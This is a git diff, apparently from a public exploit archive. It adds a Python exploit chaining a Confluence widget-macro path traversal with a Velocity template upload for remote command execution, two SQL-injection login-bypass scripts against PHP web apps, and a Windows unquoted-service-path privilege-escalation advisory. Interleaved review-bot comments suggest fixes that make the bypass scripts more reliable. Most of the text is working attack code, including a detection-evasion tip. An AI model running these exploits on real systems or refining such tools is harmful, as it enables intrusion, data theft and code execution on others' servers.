+ version="{name} {version}".format(name=SCRIPT_NAME, version=__version__)
+ )
+ parser.add_argument(
+ "-v", "--verbosity",
+ help="increase output verbosity, two possible levels, no verbosity with default log output and debug verbosity",
+ action="count",
+ default=0
+ )
+ parser.add_argument(
+ "-sb", "--skip-banner",
+ help="skips printing of the banner",
+ action="store_true",
+ default=False
+ )
+ parser.add_argument(
+ "-s", "--silent",
+ help="do not output results of the exploit to standard output",
+ action="store_true",
+ default=False
+ )
+ parser.add_argument(
+ "-q", "--quiet",
+ help="do not output any logs",
+ action="store_true",
+ default=False
+ )
+
+ # arguments for input
+ parser.add_argument(
+ "-px", "--proxy",
+ help="proxy that should be used for the request, the same proxy will be used for HTTP and HTTPS"
+ )
+ parser.add_argument(
+ "-t", "--tls",
+ help="use HTTPS protocol, default behaviour is to use plain HTTP",
+ action="store_true"
+ )
+ parser.add_argument(
+ "-th", "--target-host",
+ help="target hostname/domain",
+ required=True
+ )
+ parser.add_argument(
+ "-p", "--port",
+ help="port where the target is listening, default ports 80 for HTTP and 443 for HTTPS"
+ )
+
+ # two different sub commands
+ subparsers = parser.add_subparsers(
+ title="actions",
+ description="different behaviours of the script",
+ help="for detail description of available action options invoke -h for each individual action",
+ dest="action"
+ )
+
+ # only exploring file system by disclosure of files and directories
+ parser_file_system = subparsers.add_parser(
+ "fs",
+ help="use the exploit to browse local file system on the target endpoint"
+ )
+ parser_file_system.add_argument(
+ "path",
+ help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"
+ )
+ parser_file_system.set_defaults(func=exploit_path_traversal)
+
+ # using file upload to deploy payload and achieve RCE
+ parser_rce = subparsers.add_parser(
+ "rce",
+ help="use the exploit to upload a template "
+ )
+ parser_rce.add_argument(
+ "-hd", "--home-directory",
+ help="Confluence home directory on the server"
+ )
+ parser_rce.add_argument(
+ "-c", "--cookie",
+ help="cookie that should be used for the session, value passed as it is in HTTP request, for example: "
+ "-c JSESSIONID=ABCDEF123456789ABCDEF123456789AB",
+ type=check_cookie_format,
+ required=True
+ )
+ parser_rce.add_argument(
+ "command",
+ help="target path that should be retrieved from the vulnerable server, can be path to a file or to a directory"
+ )
+ parser_rce.set_defaults(func=exploit_rce)
+
+ # parsing
+ arguments = parser.parse_args()
+
+ return arguments
+
+
+class Configuration:
+ """
+ Represents all supported configuration items.
+ """
+
+ # Parse arguments and set all configuration variables
+ def __init__(self, script_args):
+ self.script_arguments = script_args
+
+ # setting input arguments
+ self._proxy = self.script_arguments.proxy
+ self._target_protocol = "https" if self.script_arguments.tls else "http"
+ self._target_host = self.script_arguments.target_host
+ self._target_port = self.script_arguments.port if self.script_arguments.port else \
+ 443 if self.script_arguments.tls else 80
+
+ @staticmethod
+ def get_logger(verbosity):
+ """
+ Prepares logger to output to stdout with appropriate verbosity.
+ """
+ logger = logging.getLogger()
+ # default logging level
+ logger.setLevel(logging.DEBUG)
+
+ # Definition of logging to console
+ ch = logging.StreamHandler()
+ # specific logging level for console
+ if verbosity == 0:
+ ch.setLevel(logging.INFO)
+ elif verbosity > 0:
+ ch.setLevel(logging.DEBUG)
+
+ # formatting
+ class MyFormatter(logging.Formatter):
+
+ default_fmt = logging.Formatter('[?] %(message)s')
+ info_fmt = logging.Formatter('[+] %(message)s')
+ error_fmt = logging.Formatter('[-] %(message)s')
+ warning_fmt = logging.Formatter('[!] %(message)s')
+ debug_fmt = logging.Formatter('>>> %(message)s')
+
+ def format(self, record):
+ if record.levelno == logging.INFO:
+ return self.info_fmt.format(record)
+ elif record.levelno == logging.ERROR:
+ return self.error_fmt.format(record)
+ elif record.levelno == logging.WARNING:
+ return self.warning_fmt.format(record)
+ elif record.levelno == logging.DEBUG:
+ return self.debug_fmt.format(record)
+ else:
+ return self.default_fmt.format(record)
+
+ ch.setFormatter(MyFormatter())
+
+ # adding handler
+ logger.addHandler(ch)
+
+ return logger
+
+ # Properties
+ @property
+ def endpoint(self):
+ if not self._target_protocol or not self._target_host or not self._target_port:
+ exit_log(log, "failed to generate endpoint URL")
+ return f"{self._target_protocol}://{self._target_host}:{self._target_port}"
+
+ @property
+ def remote_path(self):
+ return self.script_arguments.path
+
+ @property
+ def attachment_dir(self):
+ home_dir = self.script_arguments.home_directory if self.script_arguments.home_directory else \
+ Exploit.DEFAULT_CONFLUENCE_INSTALL_DIR
+ return f"{home_dir}{Exploit.DEFAULT_CONFLUENCE_ATTACHMENT_PATH}"
+
+ @property
+ def rce_command(self):
+ return self.script_arguments.command
+
+ @property
+ def session_cookie(self):
+ if not self.script_arguments.cookie:
+ return None
+ parts = self.script_arguments.cookie.split("=")
+ return {
+ parts[0]: parts[1]
+ }
+
+ @property
+ def proxies(self):
+ return {
+ "http": self._proxy,
+ "https": self._proxy
+ }
+
+
+class Exploit:
+ """
+ This class represents actual exploit towards the target Confluence server.
+ """
+ # used for both path traversal and RCE
+ DEFAULT_VULNERABLE_ENDPOINT = "/rest/tinymce/1/macro/preview"
+
+ # used only for RCE
+ CREATE_PERSONAL_SPACE_PATH = "/rest/create-dialog/1.0/space-blueprint/create-personal-space"
+ PERSONAL_SPACE_KEY_PATH = "/index.action"
+ PERSONAL_SPACE_KEY_REGEX = r"^/spaces/viewspace\.action\?key=(.*?)$"
+ PERSONAL_SPACE_ID_PATH = "/rest/api/space"
+ PERSONAL_SPACE_KEY_PARAMETER_NAME = "spaceKey"
+ HOMEPAGE_REGEX = r"/rest/api/content/([0-9]+)$"
+ ATL_TOKEN_PATH = "/pages/viewpageattachments.action"
+ FILE_UPLOAD_PATH = "/pages/doattachfile.action"
+ # file name has no real significance, file is identified on file system by it's ID
+ # (change only if you want to avoid detection)
+ DEFAULT_UPLOADED_FILE_NAME = "payload_{}.vm".format(
+ ''.join(random.choice(string.ascii_lowercase) for i in range(5))
+ ) # the extension .vm is not really needed, remove it if you have problems uploading the template
+ DEFAULT_CONFLUENCE_INSTALL_DIR = "/var/atlassian/application-data/confluence"
+ DEFAULT_CONFLUENCE_ATTACHMENT_PATH = "/attachments/ver003"
+ # using random name for uploaded file so it will always be first version of the file
+ DEFAULT_FILE_VERSION = "1"
+
+ def __init__(self, config):
+ """
+ Runs the exploit towards target_url.
+ """
+ self._config = config
+
+ self._target_url = f"{self._config.endpoint}{Exploit.DEFAULT_VULNERABLE_ENDPOINT}"
+
+ if self._config.script_arguments.action == "rce":
+ self._root_url = f"{self._config.endpoint}/"
+ self._create_personal_space_url = f"{self._config.endpoint}{Exploit.CREATE_PERSONAL_SPACE_PATH}"
+ self._personal_space_key_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_KEY_PATH}"
+
+ # Following data will be dynamically created while exploit is running
+ self._space_key = None
+ self._personal_space_id_url = None
+ self._space_id = None
+ self._homepage_id = None
+ self._atl_token_url = None
+ self._atl_token = None
+ self._upload_url = None
+ self._file_id = None
+
+ def generate_payload_location(self):
+ """
+ Generates location on file system for uploaded attachment based on Confluence Ver003 scheme.
+
+ See more here: https://confluence.atlassian.com/doc/hierarchical-file-system-attachment-storage-704578486.html
+ """
+ if not self._space_id or not self._homepage_id or not self._file_id:
+ exit_log(log, "cannot generate payload location without space, homepage and file ID")
+
+ space_folder_one = str(int(self._space_id[-3:]) % 250)
+ space_folder_two = str(int(self._space_id[-6:-3]) % 250)
+ space_folder_three = self._space_id
+ page_folder_one = str(int(self._homepage_id[-3:]) % 250)
+ page_folder_two = str(int(self._homepage_id[-6:-3]) % 250)
+ page_folder_three = self._homepage_id
+ file_folder = self._file_id
+ version = Exploit.DEFAULT_FILE_VERSION
+
+ payload_location = f"{self._config.attachment_dir}/" \
+ f"{space_folder_one}/{space_folder_two}/{space_folder_three}/"\
+ f"{page_folder_one}/{page_folder_two}/{page_folder_three}/" \
+ f"{file_folder}/{version}"
+ log.debug(f"generated payload location: {payload_location}")
+
+ return payload_location
+
+ def path_traversal(self, target_remote_path, decode_output=False):
+ """
+ Uses vulnerability in _template parameter to achieve path traversal.
+
+ Args:
+ target_remote_path (string): path on local file system of the target application
+ decode_output (bool): set to True if output of the file will be character codes separated by new lines,
+ used with RCE
+ """
+ post_data = {
+ "contentId": str(random.randint(1, 10000)),
+ "macro": {
+ "body": "",
+ "name": "widget",
+ "params": {
+ "_template": f"file://{target_remote_path}",
+ "url": "https://www.youtube.com/watch?v=" + ''.join(random.choice(
+ string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(11))
+ }
+ }
+ }
+
+ log.info("sending request towards vulnerable endpoint with payload in '_template' parameter")
+ response = requests.post(
+ self._target_url,
+ headers={
+ "Content-Type": "application/json; charset=utf-8"
+ },
+ json=post_data,
+ proxies=self._config.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ # check if response was proper...
+ if not response.status_code == 200:
+ log.debug(f"response code: {response.status_code}")
+ exit_log(log, "exploit failed")
+
+ page_content = response.content
+ # response is HTML
+ soup = BeautifulSoup(page_content, features="html.parser")
+
+ # if div element with class widget-error is returned, that means the exploit worked but it failed to retrieve
+ # the requested path
+ error_element = soup.find_all("div", "widget-error")
+ if error_element:
+ log.warning("failed to retrieve target path on the system")
+ log.warning("target path does not exist or application does not have appropriate permissions to view it")
+ return ""
+ else:
+ # otherwise parse out the actual response (file content or directory listing)
+ output_element = soup.find_all("div", "wiki-content")
+
+ if not output_element:
+ exit_log(log, "application did not return appropriate HTML element")
+ if not len(output_element) == 1:
+ log.warning("application unexpectedly returned multiple HTML elements, using the first one")
+ output_element = output_element[0]
+
+ log.debug("extracting HTML element value and stripping the leading and trailing spaces")
+ # output = output_element.string.strip()
+ output = output_element.decode_contents().strip()
+
+ if "The macro 'widget' is unknown. It may have been removed from the system." in output:
+ exit_log(log, "widget seems to be disabled on system, target most likely is not vulnerable")
+
+ if not self._config.script_arguments.silent:
+ if decode_output:
+ parsed_output = ""
+ p = re.compile(r"^([0-9]+)")
+ for line in output.split("\n"):
+ r = p.match(line)
+ if r:
+ parsed_output += chr(int(r.group(1)))
+ print(parsed_output.strip())
+ else:
+ print(output)
+
+ return output
+
+ def find_personal_space_key(self):
+ """
+ Makes request that will return personal space key in the response.
+ """
+ log.debug("checking if user has personal space")
+ response = requests.get(
+ self._root_url,
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ )
+ page_content = response.text
+ if "Add personal space" in page_content:
+ log.info(f"user does not have personal space, creating it now...")
+
+ response = requests.post(
+ self._create_personal_space_url,
+ headers={
+ "Content-Type": "application/json"
+ },
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ json={
+ "spaceUserKey": ""
+ }
+ )
+
+ if not response.status_code == 200:
+ log.debug(f"response code: {response.status_code}")
+ exit_log(log, "failed to create personal space")
+
+ log.debug(f"personal space created")
+ response_data = response.json()
+ self._space_key = response_data.get("key")
+ else:
+ log.info("sending request to find personal space key")
+ response = requests.get(
+ self._personal_space_key_url,
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ # check if response was proper...
+ if not response.status_code == 200:
+ log.debug(f"response code: {response.status_code}")
+ exit_log(log, "failed to get personal space key")
+
+ page_content = response.content
+ # response is HTML
+ soup = BeautifulSoup(page_content, features="html.parser")
+
+ personal_space_link_element = soup.find("a", id="view-personal-space-link")
+ if not personal_space_link_element or not personal_space_link_element.has_attr("href"):
+ exit_log(log, "failed to find personal space link in the response, does the user have personal space?")
+ path = personal_space_link_element["href"]
+ p = re.compile(Exploit.PERSONAL_SPACE_KEY_REGEX)
+ r = p.match(path)
+ if r:
+ self._space_key = r.group(1)
+ else:
+ exit_log(log, "failed to find personal space key")
+
+ log.debug(f"personal space key: {self._space_key}")
+ self._personal_space_id_url = f"{self._config.endpoint}{Exploit.PERSONAL_SPACE_ID_PATH}?" \
+ f"{Exploit.PERSONAL_SPACE_KEY_PARAMETER_NAME}={self._space_key}"
+ log.debug(f"generated personal space id url: {self._personal_space_id_url}")
+
+ def find_personal_space_id_and_homepage_id(self):
+ """
+ Makes request that will return personal space ID and homepage ID in the response.
+ """
+ if self._personal_space_id_url is None:
+ exit_log(log, f"personal space id url is missing, did you call exploit functions in correct order?")
+
+ log.info("sending request to find personal space ID and homepage")
+ response = requests.get(
+ self._personal_space_id_url,
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ # check if response was proper...
+ if not response.status_code == 200:
+ log.debug(f"response code: {response.status_code}")
+ exit_log(log, "failed to get personal space key")
+
+ page_content = response.content
+ # response is JSON
+ data = json.loads(page_content)
+
+ if "results" not in data:
+ exit_log(log, "failed to find 'result' section in json output")
+ items = data["results"]
+ if type(items) is not list or len(items) == 0:
+ exit_log(log, "no results for personal space id")
+ personal_space_data = items[0]
+ if "id" not in personal_space_data:
+ exit_log(log, "failed to find ID in personal space data")
+ self._space_id = str(personal_space_data["id"])
+ log.debug(f"found space id: {self._space_id}")
+ if "_expandable" not in personal_space_data:
+ exit_log(log, "failed to find '_expandable' section in personal space data")
+ personal_space_expandable_data = personal_space_data["_expandable"]
+ if "homepage" not in personal_space_expandable_data:
+ exit_log(log, "failed to find homepage in personal space expandable data")
+ homepage_path = personal_space_expandable_data["homepage"]
+ p = re.compile(Exploit.HOMEPAGE_REGEX)
+ r = p.match(homepage_path)
+ if r:
+ self._homepage_id = r.group(1)
+ log.debug(f"found homepage id: {self._homepage_id}")
+ self._atl_token_url = f"{self._config.endpoint}{Exploit.ATL_TOKEN_PATH}?pageId={self._homepage_id}"
+ log.debug(f"generated atl token url: {self._atl_token_url}")
+ self._upload_url = f"{self._config.endpoint}{Exploit.FILE_UPLOAD_PATH}?pageId={self._homepage_id}"
+ log.debug(f"generated upload url: {self._upload_url}")
+ else:
+ exit_log(log, "failed to find homepage id, homepage path has incorrect format")
+
+ def get_csrf_token(self):
+ """
+ Makes request to get the current CSRF token for the session.
+ """
+ if self._atl_token_url is None:
+ exit_log(log, f"atl token url is missing, did you call exploit functions in correct order?")
+
+ log.info("sending request to find CSRF token")
+ response = requests.get(
+ self._atl_token_url,
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ # check if response was proper...
+ if not response.status_code == 200:
+ log.debug(f"response code: {response.status_code}")
+ exit_log(log, "failed to get personal space key")
+
+ page_content = response.content
+ # response is HTML
+ soup = BeautifulSoup(page_content, features="html.parser")
+
+ atl_token_element = soup.find("input", {"name": "atl_token"})
+ if not atl_token_element.has_attr("value"):
+ exit_log(log, "failed to find value for atl_token")
+ self._atl_token = atl_token_element["value"]
+ log.debug(f"found CSRF token: {self._atl_token}")
+
+ def upload_template(self):
+ """
+ Makes multipart request to upload the template file to the server.
+ """
+ log.info("uploading template to server")
+ if not self._atl_token:
+ exit_log(log, "cannot upload a file without CSRF token")
+ if self._upload_url is None:
+ exit_log(log, f"upload url is missing, did you call exploit functions in correct order?")
+
+ # Velocity template here executes command and then captures the output. Here the output is generated by printing
+ # character codes one by one in each line. This can be improved for sure but did not have time to investigate
+ # why techniques from James Kettle's awesome research paper 'Server-Side Template Injection:RCE for the modern
+ # webapp' was not working properly. This gets decoded on our python client later.
+ template = f"""#set( $test = "test" )
+#set($ex = $test.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{self._config.script_arguments.command}"))
+#set($exout = $ex.waitFor())
+#set($out = $ex.getInputStream())
+#foreach($i in [1..$out.available()])
+#set($ch = $out.read())
+$ch
+#end"""
+
+ log.debug(f"uploading template payload under name {Exploit.DEFAULT_UPLOADED_FILE_NAME}")
+ parts = {
+ "atl_token": (None, self._atl_token),
+ "file_0": (Exploit.DEFAULT_UPLOADED_FILE_NAME, template),
+ "confirm": "Attach"
+ }
+ response = requests.post(
+ self._upload_url,
+ cookies=self._config.session_cookie,
+ proxies=self._config.proxies,
+ verify=False,
+ files=parts
+ )
+
+ # for successful upload first a 302 response needs to happen then 200 page is returned with file ID
+ if response.status_code == 403:
+ exit_log(log, "got 403, probably problem with CSRF token")
+ if not len(response.history) == 1 or not response.history[0].status_code == 302:
+ exit_log(log, "failed to upload the payload")
+
+ page_content = response.content
+
+ if "Upload Failed" in str(page_content):
+ exit_log(log, "failed to upload template")
+
+ # response is HTML
+ soup = BeautifulSoup(page_content, features="html.parser")
+
+ file_link_element = soup.find("a", "filename", {"title": Exploit.DEFAULT_UPLOADED_FILE_NAME})
+ if not file_link_element.has_attr("data-linked-resource-id"):
+ exit_log(log, "failed to find data-linked-resource-id attribute (file ID) for uploaded file link")
+ self._file_id = file_link_element["data-linked-resource-id"]
+ log.debug(f"found file ID: {self._file_id}")
+
+
+def exploit_path_traversal(config):
+ """
+ This sends one request towards vulnerable server to either get local file content or directory listing.
+ """
+ log.debug("running path traversal exploit")
+
+ exploit = Exploit(config)
+ exploit.path_traversal(config.remote_path)
+
+
+def exploit_rce(config):
+ """This executes multiple steps to gain RCE. Requires a session token.
+
+ Steps:
+ 1. find personal space key for the user
+ 2. find personal space ID and homepage ID for the user
+ 3. get CSRF token (generated per session)
+ 4. upload template file with Java code (involves two requests, first one is 302 redirection)
+ 5. use path traversal part of exploit to load and execute local template file
+ 6. profit
+ """
+ log.debug("running RCE exploit")
+
+ exploit = Exploit(config)
+ exploit.find_personal_space_key()
+ exploit.find_personal_space_id_and_homepage_id()
+ exploit.get_csrf_token()
+ exploit.upload_template()
+ payload_location = exploit.generate_payload_location()
+ exploit.path_traversal(payload_location, decode_output=True)
+
+
+if __name__ == "__main__":
+ # parse arguments and load all configuration items
+ script_arguments = parse_arguments()
+ log = Configuration.get_logger(script_arguments.verbosity)
+
+ configuration = Configuration(script_arguments)
+
+ # printing banner
+ if not configuration.script_arguments.skip_banner:
+ print_banner()
+
+ if script_arguments.quiet:
+ log.disabled = True
+
+ log.debug("finished parsing CLI arguments")
+ log.debug("configuration was loaded successfully")
+ log.debug("starting exploit")
+
+ # disabling warning about trusting self sign certificate from python requests
+ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+ # run appropriate function depending on mode
+ configuration.script_arguments.func(configuration)
+
+ log.debug("done!")
\ No newline at end of file
diff --git a/exploits/php/webapps/49462.py b/exploits/php/webapps/49462.py
new file mode 100755
index 000000000..46b641849
--- /dev/null
+++ b/exploits/php/webapps/49462.py
@@ -0,0 +1,58 @@
+# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
+# Exploit Author: Himanshu Shukla
+# Date: 2021-01-21
+# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
+# Version: 1.0
+# Tested On: Windows 10 + XAMPP 7.4.4
+# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
+#STEP 1 : Run The Exploit With This Command : python3 exploit.py
+#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
+#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
+
+#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
+
+import requests
+YELLOW = '\033[33m' # Yellow Text
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+print(YELLOW+' _ ______ _ _ ___ ', RESET)
+print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
+print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
+print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
+print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
+print(YELLOW+" ", RESET)
+print('********************************************************')
+print('** LIBRARY SYSTEM 1.0 **')
+print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
+print('********************************************************')
+
+print('Author - Himanshu Shukla')
+
+
+#Create a new session
+
+s = requests.Session()
+
+#Set Cookie
+cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
+
+LINK=input("Enter URL of The Vulnarable Application : ")
+
+#Authentication Bypass
+print("[*]Attempting Authentication Bypass...")
+values = {"student":"'or 1 or'","login":""}
+r=s.post(LINK+'login.php', data=values, cookies=cookies)
+
+r=s.post(LINK+'login.php', data=values, cookies=cookies)
+
+#Check if Authentication was bypassed or not.
+logged_in = True if not("Student not found" in r.text) else False
+l=logged_in
+if l:
+ print(GREEN+"[+]Authentication Bypass Successful!", RESET)
+ print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
+else:
+ print(RED+"[-]Failed To Authenticate!", RESET)
\ No newline at end of file
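Review bot: The success check on the `logged_in =` line reports a bypass whenever the response merely lacks the string "Student not found", so any 404, PHP error page or wrong `LINK` (including one without a trailing slash, since `LINK+'login.php'` is plain concatenation) is printed as "Authentication Bypass Successful!". The check should at least require a 200 and simplify to `logged_in = r.status_code == 200 and "Student not found" not in r.text`, dropping the redundant `l=logged_in` alias. The identical `s.post(...)` is also issued twice in a row (the two `r=s.post(LINK+'login.php', ...)` lines); the first call's result is discarded, so one of them should go, and a `timeout=` on the remaining call would stop the script from hanging indefinitely on an unreachable host. The hard-coded `PHPSESSID` in `cookies` is unnecessary with a `requests.Session()`, which tracks the server-issued session cookie itself; a comment explaining why a fixed value is passed would help the next reader.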
diff --git a/exploits/php/webapps/49463.py b/exploits/php/webapps/49463.py
new file mode 100755
index 000000000..5cfc381bd
--- /dev/null
+++ b/exploits/php/webapps/49463.py
@@ -0,0 +1,82 @@
+# Exploit Title: CASAP Automated Enrollment System 1.0 - Authentication Bypass
+# Exploit Author: Himanshu Shukla
+# Date: 2021-01-21
+# Vendor Homepage: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/Yna%20Ecole/final.zip
+# Version: 1.0
+# Tested On: Ubuntu + XAMPP 7.4.4
+# Description: CASAP Automated Enrollment System 1.0 - Authentication Bypass Using SQLi
+
+
+#STEP 1 : Run The Exploit With This Command : python3 exploit.py
+# For Example: python3 exploit.py http://10.9.67.23/final/
+#STEP 2 : Open the Link Provided At The End After Successful Authentication Bypass in Browser.
+
+
+import time
+import sys
+import requests
+
+
+YELLOW = '\033[33m' # Yellow Text
+GREEN = '\033[32m' # Green Text
+RED = '\033[31m' # Red Text
+RESET = '\033[m' # reset to the defaults
+
+print(YELLOW+' _ ______ _ _ ___ ', RESET)
+print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
+print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
+print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
+print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
+print(YELLOW+" ", RESET)
+print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
+print('!!! CASAP AUTOMATED ENROLLMENT SYSTEM 1.0 !!!')
+print('!!! AUTHENTICATION BYPASS !!!')
+print('!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')
+
+print('Author - Himanshu Shukla')
+
+
+def authbypass(url):
+
+ #Authentication Bypass
+ s = requests.Session()
+ #Set Cookie
+ cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
+
+
+ print ("[*]Attempting Authentication Bypass...")
+ time.sleep(1)
+
+ values = {"username":"'or 1 or'","password":""}
+ r=s.post(url+'login.php', data=values, cookies=cookies)
+ p=s.get(url+'dashboard.php', cookies=cookies)
+
+ #Check if Authentication was bypassed or not.
+ logged_in = True if ("true_admin" in r.text) else False
+ l=logged_in
+ if l:
+ print(GREEN+"[+]Authentication Bypass Successful!", RESET)
+ print(YELLOW+"[+]Open This Link To Continue As Admin : "+url+"dashboard.php", RESET)
+ else:
+ print(RED+"[-]Failed To Authenticate!", RESET)
+ print(RED+"[-]Check Your URL", RESET)
+
+
+if __name__ == "__main__":
+
+
+ if len(sys.argv)!=2:
+ print(RED+"You Haven't Provided any URL!", RESET)
+ print("Usage : python3 exploit.py ")
+ print("Example : python3 exploit.py http://10.9.7.3/final/")
+ exit()
+
+ try:
+
+ authbypass(sys.argv[1])
+
+ except:
+
+ print(RED+"[-]Invalid URL!", RESET)
+ exit()
\ No newline at end of file
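Review bot: The bare `except:` around `authbypass(sys.argv[1])` in the `__main__` block swallows every exception — connection refused, timeouts, `KeyboardInterrupt` and even typos in the function — and reports all of them as "Invalid URL!", which hides the real cause from the user. Narrow it to the network errors it is meant to cover, `except requests.exceptions.RequestException as err:` and include `err` in the printed message, so a Ctrl-C or a genuine bug still surfaces. Inside `authbypass`, `p=s.get(url+'dashboard.php', ...)` is never read and should be removed or used, and `logged_in = True if ("true_admin" in r.text) else False` followed by `l=logged_in` reduces to `logged_in = "true_admin" in r.text`. As in 49462.py, the fixed `PHPSESSID` in `cookies` is redundant with the `requests.Session()` and deserves either removal or a comment explaining why a static value is sent.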
diff --git a/exploits/windows/local/49453.txt b/exploits/windows/local/49453.txt
new file mode 100644
index 000000000..1f79c8dde
--- /dev/null
+++ b/exploits/windows/local/49453.txt
@@ -0,0 +1,70 @@
+# Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation
+# Date: 08.11.2020
+# Exploit Author: LiquidWorm
+# Vendor Homepage: https://www.selea.com
+
+Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation
+
+
+Vendor: Selea s.r.l.
+Product web page: https://www.selea.com
+Affected version: 4.0.1.6(210120)
+ 4.013(201105)
+ 3.100(200225)
+ 3.005(191206)
+ 3.005(191112)
+
+Summary: Our CPS (Car Plate Server) software is an advanced solution that can
+be installed on computers and servers and used as an operations centre. It can
+create sophisticated traffic control and road safety systems connecting to
+stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert
+notifications directly to tablets or smartphones, it can receive and transfer
+data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution
+that offers full integration with main video surveillance software. Our CPS
+software connects to the national operations centre and provides law enforcement
+authorities with necessary tools to issue alerts. CPS is designed to guarantee
+cooperation among different law enforcement agencies. It allows to create a
+multi-user environment that manages different hierarchy levels and the related
+division of competences.
+
+Desc: The application suffers from an unquoted search path issue impacting the
+service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software
+application. This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system. A successful
+attempt would require the local user to be able to insert their code in the system
+root path undetected by the OS or other security applications where it could
+potentially be executed during application startup or reboot. If successful, the
+local user's code would execute with the elevated privileges of the application.
+
+Tested on: Microsoft Windows 10 Enterprise
+ SeleaCPSHttpServer/1.1
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2021-5621
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php
+
+
+08.11.2020
+
+--
+
+
+C:\Users\Smurf>sc qc "Selea CarPlateServer"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Selea CarPlateServer
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Selea CarPlateServer
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\Smurf>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 92458bfc2..3aadaee24 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11244,6 +11244,7 @@ id,file,description,date,author,type,platform,port
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
+49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",2021-01-22,LiquidWorm,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43649,3 +43650,16 @@ id,file,description,date,author,type,platform,port
49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,
+49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple,
